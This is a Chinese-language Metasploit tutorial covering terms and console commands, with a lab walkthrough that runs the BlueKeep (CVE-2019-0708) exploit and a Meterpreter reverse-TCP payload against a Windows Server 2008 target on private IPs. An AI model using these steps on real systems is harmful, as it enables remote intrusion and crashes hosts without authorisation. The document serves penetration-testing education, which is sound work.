0X01工具简介：

Metasploit是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带许多个已知软件漏洞的专业级漏洞攻击工具，简单可以理解为是一个漏洞利用平台。

 

0X02常用术语：

渗透攻击（exploit）：

测试者利用系统、程序或服务的漏洞进行攻击的一个过程。

 

攻击载荷（payload）：

攻击者在目标系统上执行的一段攻击代码，该代码具有反弹连接，创建用户，执行其他系统命令的功能。

 

Shellcode：

在目标主机上运行的一段机器指令，成功执行后会返回一个shell。

 

模块（module）：

是指metasploit框架中所使用的一段软件代码组件。

 

监听器（listener）

监听器是metasploit中用来等待介入网络连接的组件。

0X03工具启动：

Kali-linux终端下：

Msfconsole

可以看到它收纳的漏洞利用模块、攻击载荷、扫描模块等。

 

 0X04常用参数：

Msfconsole：启动

Show exploit：显示所有渗透攻击模块

Show payloads：显示所有辅助攻击模块

Search name：查找模块

Info：显示模块的相关信息

RHOST：目标主机

LHOST：目标主机链接IP地址

Use name：使用模块

Show options：显示模块的所有参数配置

Show targets：显示目标系统

Set target：指定目标系统的系统

Set payload：指定使用的攻击载荷

Exploit：开始攻击

Sysinfo：显示被控制主机的系统信息

Shell：运行交互shell

0X05：使用案例：

使用环境：

攻击机：kali-linux（172.17.1.58）

 

 靶  机：windows server2008（172.17.1.62）

 

 

漏  洞：远程桌面代码执行漏洞（cve-2019-0708）

启动metasploit：

msfconsole

搜索漏洞利用模块：

search cve-2019-0708

使用攻击模块：

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

 

显示攻击载荷：

show payloads

 

指定攻击载荷：

set payload windows/x64/meterpreter/reverse_tcp

 

显示所有参数配置：

show options

设置目标主机：

set RHOSTS 172.17.1.62

设置反弹地址：

set LHOST 172.17.1.58

显示目标系统：

show targets

指定目标系统(vmware 15)：

set target 4

 

开始攻击：

run

 

 Windows server 2008宕机重启：